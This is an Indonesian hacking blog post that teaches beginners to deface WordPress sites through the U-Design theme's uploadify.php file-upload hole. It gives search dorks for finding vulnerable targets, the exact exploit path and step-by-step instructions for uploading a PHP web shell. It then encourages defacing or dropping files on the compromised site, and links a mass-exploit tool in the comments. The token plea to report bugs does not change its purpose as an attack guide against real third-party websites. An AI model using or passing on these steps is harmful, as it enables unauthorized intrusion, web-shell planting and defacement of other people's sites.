xixihi, Lanjut Walking Blog geenggs, kali ini gue bakal Share dan Bahas salah satu Bug/Celah yang ada pada Themes di CMS WordPress .
xixhi, yoii ini CMS yang banyak di manfaatkan oleh para pentester n dipenser utk nemuin eXploit baru , entah itu bug terletak pada Themesnye atau Plugin dan lain2nyee :3
yoo, langsung bae, kali ini Nue baakal Share Tutorial Deface CMS WordPress dengan U-Design Themes eXploit. *eXploit lawas sih, kali aje masih crootz
Lanjut intip tutornye beebz ;*
 |
| Ojo kendorr ,le :v |
Dork :
inurl:themes/u-design/ ext:jpg > image
"index of /'' ''uploadify.php'' ''wp-content"
(gunakan imajinasi vokeper lu utk ngembangin nih Dork, biar dpt yg vuln n verawan)
eXploit :
/wp-content/themes/u-design//scripts/admin/uploadify/uploadify.php
Auto Xploit : Don't touch Me , Senpai :'D
1. Dorking menggunakan Search Engine
2. Pilih target kalian, Lalu masukan eXploitnyee.
contoh: target.c0li/wp-content/themes/u-design//scripts/admin/uploadify/uploadify.php
3. Vulnerability ~ Blank
4. Buka Link Auto Xploit, langsung taroo Link target Lu ke Auto Xploit.
klick look bitch dan klick choose file, nah kalian upload shell berekstensi php jika sudah klick crootz
 |
| target.c0li/wp-content/themes/u-design//scripts/admin/uploadify/uploadify.php |
5. nah kalo bener ada angka 1 gini dan jika begini shell kalian sudah terupload :3 #Work
 |
| jozz gondos, #Done |
 |
| wkwkw jozz deh, seterah mo lu apain :'3 |
Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela *Tetap hargai karya para WebMaster ;*
"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Btw yuk up2date tentang TKJ Cyber Art, di Official Account Line Kami: http://line.me/ti/p/%40hjl8740i
*bebas utk bertanya *sharing bareng *kepo2deh akwkwa #joinUs
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy WordPress Hacked ~
Sekian dan semoga bermanfaat .. terimakasih
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy WordPress Hacked ~
Sekian dan semoga bermanfaat .. terimakasih
./Nuenomaru
 |
| Sukses adalah cara balas Dendam terbaik, utk orang2 yg memandang Lu Sebelah Mata |
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
Line : http://line.me/ti/p/%40hjl8740i
2 comments
link auto exploit udah mati om
Bagi para Pembaca artikel Ini,, link auto exploit memang mati.
silahkan ambil source code auto MassExploiter U-design di sini: http://pastebin.com/t8PvtP0h
sc by: indoxploit
terimakasih
#Nuenomaru
EmoticonEmoticon